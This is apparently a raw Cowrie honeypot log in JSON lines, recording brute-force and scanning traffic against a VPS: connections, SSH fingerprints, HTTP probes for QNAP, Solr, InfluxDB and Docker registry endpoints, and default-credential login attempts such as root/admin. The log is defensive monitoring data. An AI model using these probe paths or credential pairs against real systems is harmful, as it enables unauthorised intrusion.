{"eventid":"cowrie.session.connect","src_ip":"64.226.67.179","src_port":57078,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8578976505a","protocol":"telnet","message":"New connection: 64.226.67.179:57078 (1.2.3.4:23) [session: e8578976505a]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.848396Z"}
{"eventid":"cowrie.login.failed","username":"GET /cgi-bin/authLogin.cgi HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /cgi-bin/authLogin.cgi HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.849764Z","src_ip":"64.226.67.179","session":"e8578976505a"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.850653Z","src_ip":"64.226.67.179","session":"e8578976505a"}
{"eventid":"cowrie.session.closed","duration":0.015822887420654297,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.851636Z","src_ip":"64.226.67.179","session":"7303db02b34c"}
{"eventid":"cowrie.session.closed","duration":0.014981985092163086,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.855237Z","src_ip":"104.248.30.84","session":"4f39430fc651"}
{"eventid":"cowrie.session.closed","duration":0.013698816299438477,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.858824Z","src_ip":"159.89.7.63","session":"56b7d5701c6c"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.67.179","src_port":57082,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e9328468b8c","protocol":"telnet","message":"New connection: 64.226.67.179:57082 (1.2.3.4:23) [session: 4e9328468b8c]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.859809Z"}
{"eventid":"cowrie.login.failed","username":"GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.860949Z","src_ip":"64.226.67.179","session":"4e9328468b8c"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.862230Z","src_ip":"64.226.67.179","session":"4e9328468b8c"}
{"eventid":"cowrie.session.closed","duration":0.015083551406860352,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.863436Z","src_ip":"64.226.67.179","session":"e8578976505a"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.30.84","src_port":14890,"dst_ip":"1.2.3.4","dst_port":23,"session":"6e9c0efe5219","protocol":"telnet","message":"New connection: 104.248.30.84:14890 (1.2.3.4:23) [session: 6e9c0efe5219]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.865950Z"}
{"eventid":"cowrie.login.failed","username":"GET /solr/admin/info/system HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /solr/admin/info/system HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.866629Z","src_ip":"104.248.30.84","session":"6e9c0efe5219"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.867630Z","src_ip":"104.248.30.84","session":"6e9c0efe5219"}
{"eventid":"cowrie.session.connect","src_ip":"159.89.7.63","src_port":13610,"dst_ip":"1.2.3.4","dst_port":23,"session":"adbd4c4f10b7","protocol":"telnet","message":"New connection: 159.89.7.63:13610 (1.2.3.4:23) [session: adbd4c4f10b7]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.869346Z"}
{"eventid":"cowrie.login.failed","username":"GET /v2/_catalog HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /v2/_catalog HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.870043Z","src_ip":"159.89.7.63","session":"adbd4c4f10b7"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.870608Z","src_ip":"159.89.7.63","session":"adbd4c4f10b7"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.67.179","src_port":57084,"dst_ip":"1.2.3.4","dst_port":23,"session":"2f474d6cbff0","protocol":"telnet","message":"New connection: 64.226.67.179:57084 (1.2.3.4:23) [session: 2f474d6cbff0]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.872548Z"}
{"eventid":"cowrie.login.failed","username":"GET /cgi-bin/authLogin.cgi HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /cgi-bin/authLogin.cgi HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.873321Z","src_ip":"64.226.67.179","session":"2f474d6cbff0"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.874251Z","src_ip":"64.226.67.179","session":"2f474d6cbff0"}
{"eventid":"cowrie.session.closed","duration":0.015642166137695312,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.875392Z","src_ip":"64.226.67.179","session":"4e9328468b8c"}
{"eventid":"cowrie.session.closed","duration":0.012790441513061523,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.878694Z","src_ip":"104.248.30.84","session":"6e9c0efe5219"}
{"eventid":"cowrie.session.closed","duration":0.013501405715942383,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.882807Z","src_ip":"159.89.7.63","session":"adbd4c4f10b7"}
{"eventid":"cowrie.session.closed","duration":0.01316690444946289,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.885643Z","src_ip":"64.226.67.179","session":"2f474d6cbff0"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.30.84","src_port":14902,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee0a3debec18","protocol":"telnet","message":"New connection: 104.248.30.84:14902 (1.2.3.4:23) [session: ee0a3debec18]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.889065Z"}
{"eventid":"cowrie.login.failed","username":"GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.889773Z","src_ip":"104.248.30.84","session":"ee0a3debec18"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.890638Z","src_ip":"104.248.30.84","session":"ee0a3debec18"}
{"eventid":"cowrie.session.closed","duration":0.013077020645141602,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.902077Z","src_ip":"104.248.30.84","session":"ee0a3debec18"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.30.84","src_port":14910,"dst_ip":"1.2.3.4","dst_port":23,"session":"92f7273675fc","protocol":"telnet","message":"New connection: 104.248.30.84:14910 (1.2.3.4:23) [session: 92f7273675fc]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.912590Z"}
{"eventid":"cowrie.login.failed","username":"GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.913341Z","src_ip":"104.248.30.84","session":"92f7273675fc"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.914000Z","src_ip":"104.248.30.84","session":"92f7273675fc"}
{"eventid":"cowrie.session.closed","duration":0.012600898742675781,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.925130Z","src_ip":"104.248.30.84","session":"92f7273675fc"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.30.84","src_port":14922,"dst_ip":"1.2.3.4","dst_port":23,"session":"5abfd19ce073","protocol":"telnet","message":"New connection: 104.248.30.84:14922 (1.2.3.4:23) [session: 5abfd19ce073]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.935761Z"}
{"eventid":"cowrie.login.failed","username":"GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.937161Z","src_ip":"104.248.30.84","session":"5abfd19ce073"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.938555Z","src_ip":"104.248.30.84","session":"5abfd19ce073"}
{"eventid":"cowrie.session.closed","duration":0.014505147933959961,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.950155Z","src_ip":"104.248.30.84","session":"5abfd19ce073"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:49.140710Z","src_ip":"51.79.164.132","session":"aee7094cde33"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:50.679318Z","src_ip":"51.79.164.132","session":"aee7094cde33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54264,"dst_ip":"1.2.3.4","dst_port":22,"session":"60c22e088815","protocol":"ssh","message":"New connection: 212.227.125.160:54264 (1.2.3.4:22) [session: 60c22e088815]","sensor":"my-vps","timestamp":"2025-08-28T09:44:56.525031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:44:56.526067Z","src_ip":"212.227.125.160","session":"60c22e088815"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-28T09:44:56.596028Z","src_ip":"212.227.125.160","session":"60c22e088815"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:44:56.808060Z","src_ip":"212.227.125.160","session":"60c22e088815"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":38608,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee56e85b82fd","protocol":"ssh","message":"New connection: 185.93.89.7:38608 (1.2.3.4:22) [session: ee56e85b82fd]","sensor":"my-vps","timestamp":"2025-08-28T09:45:01.070002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:45:01.081052Z","src_ip":"185.93.89.7","session":"ee56e85b82fd"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:45:01.091624Z","src_ip":"185.93.89.7","session":"ee56e85b82fd"}
{"eventid":"cowrie.login.failed","username":"index","password":"147258","message":"login attempt [index/147258] failed","sensor":"my-vps","timestamp":"2025-08-28T09:45:01.180328Z","src_ip":"185.93.89.7","session":"ee56e85b82fd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:45:02.398249Z","src_ip":"185.93.89.7","session":"ee56e85b82fd"}
{"eventid":"cowrie.session.closed","duration":20.016676425933838,"message":"Connection lost after 20 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:45:08.823064Z","src_ip":"161.35.201.222","session":"330fd3a108f5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34568,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ebc4e99f872","protocol":"ssh","message":"New connection: 51.79.164.132:34568 (1.2.3.4:22) [session: 0ebc4e99f872]","sensor":"my-vps","timestamp":"2025-08-28T09:45:13.737876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:45:14.884155Z","src_ip":"51.79.164.132","session":"0ebc4e99f872"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:45:14.884832Z","src_ip":"51.79.164.132","session":"0ebc4e99f872"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59212,"dst_ip":"1.2.3.4","dst_port":23,"session":"b7e6a94a05a0","protocol":"telnet","message":"New connection: 212.227.125.160:59212 (1.2.3.4:23) [session: b7e6a94a05a0]","sensor":"my-vps","timestamp":"2025-08-28T09:45:15.734784Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:45:15.823823Z","src_ip":"212.227.125.160","session":"b7e6a94a05a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:45:15.840342Z","src_ip":"212.227.125.160","session":"b7e6a94a05a0"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T09:45:19.691265Z","src_ip":"51.79.164.132","session":"0ebc4e99f872"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:45:21.790581Z","src_ip":"51.79.164.132","session":"0ebc4e99f872"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":56600,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b86d2a9f16f","protocol":"ssh","message":"New connection: 185.93.89.7:56600 (1.2.3.4:22) [session: 2b86d2a9f16f]","sensor":"my-vps","timestamp":"2025-08-28T09:45:25.148789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:45:25.152462Z","src_ip":"185.93.89.7","session":"2b86d2a9f16f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:45:25.172883Z","src_ip":"185.93.89.7","session":"2b86d2a9f16f"}
{"eventid":"cowrie.login.failed","username":"index","password":"55555","message":"login attempt [index/55555] failed","sensor":"my-vps","timestamp":"2025-08-28T09:45:25.284117Z","src_ip":"185.93.89.7","session":"2b86d2a9f16f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:45:26.305496Z","src_ip":"185.93.89.7","session":"2b86d2a9f16f"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":42912,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dd3998fc530","protocol":"ssh","message":"New connection: 51.79.164.132:42912 (1.2.3.4:22) [session: 0dd3998fc530]","sensor":"my-vps","timestamp":"2025-08-28T09:45:40.745069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:45:40.839562Z","src_ip":"51.79.164.132","session":"0dd3998fc530"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:45:41.148476Z","src_ip":"51.79.164.132","session":"0dd3998fc530"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:45:42.926110Z","src_ip":"51.79.164.132","session":"0dd3998fc530"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:45:44.388180Z","src_ip":"51.79.164.132","session":"0dd3998fc530"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40978,"dst_ip":"1.2.3.4","dst_port":22,"session":"af428fdcf546","protocol":"ssh","message":"New connection: 185.93.89.7:40978 (1.2.3.4:22) [session: af428fdcf546]","sensor":"my-vps","timestamp":"2025-08-28T09:45:53.903659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:45:53.905305Z","src_ip":"185.93.89.7","session":"af428fdcf546"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:45:53.921741Z","src_ip":"185.93.89.7","session":"af428fdcf546"}
